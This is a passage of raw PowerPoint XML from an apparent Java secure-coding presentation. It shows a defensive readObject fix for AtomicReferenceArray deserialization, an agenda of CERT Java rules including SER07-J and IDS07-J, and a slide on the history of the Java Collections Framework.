            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  throws </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>java.io.IOException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, ClassNotFoundException {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  // Note: This must be changed if fields are added</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  Object a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.readFields</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>().get("array", null);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  if (a == null || !</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.getClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    throw new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>java.io.InvalidObjectException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("Not an array");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.getClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() != Object[].class){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Arrays.copyOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      (Object[])a, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Array.getLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(a), Object[].class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unsafe.putObjectVolatile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>arrayFieldOffset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, a);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="タイトル 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266737" y="227361"/>
            <a:ext cx="8294400" cy="713232"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AtomicReferenceArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;E&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3800" dirty="0" smtClean="0"/>
              <a:t>Fix</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangular Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="4953000"/>
            <a:ext cx="7162800" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -27083"/>
              <a:gd name="adj2" fmla="val -63341"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Defensive copy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>OBJ06-J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>. Defensively copy mutable inputs and mutable internal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>components</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ensures the object remains private. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3310443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dissolv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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Secure Coding and SCALe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>SER07-J. Do not use the default serialized form for classes with implementation-defined invariants </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EXP04-J. Do not pass arguments to certain Java Collections Framework methods that are a different type than the collection parameter type </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>OBJ03-J. Prevent heap pollution </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>IDS07-J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. Do not pass untrusted, unsanitized data to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Runtime.exec()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>method</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1413390978"/>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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266737" y="227361"/>
            <a:ext cx="8294400" cy="713232"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java Collections Framework </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>History</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダ 24"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264855" y="1143101"/>
            <a:ext cx="8439530" cy="5267673"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java Collections Framework </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>introduced </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>in Java 1.2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Includes raw (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>unparameterized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>) types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>List</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Vector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>These </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>classes don’t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>type-check their elements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Generic (parameterized) types added in Java 1.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>List&lt;*&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Vector&lt;*&gt;</a:t>
            </a:r>
            <a:r>
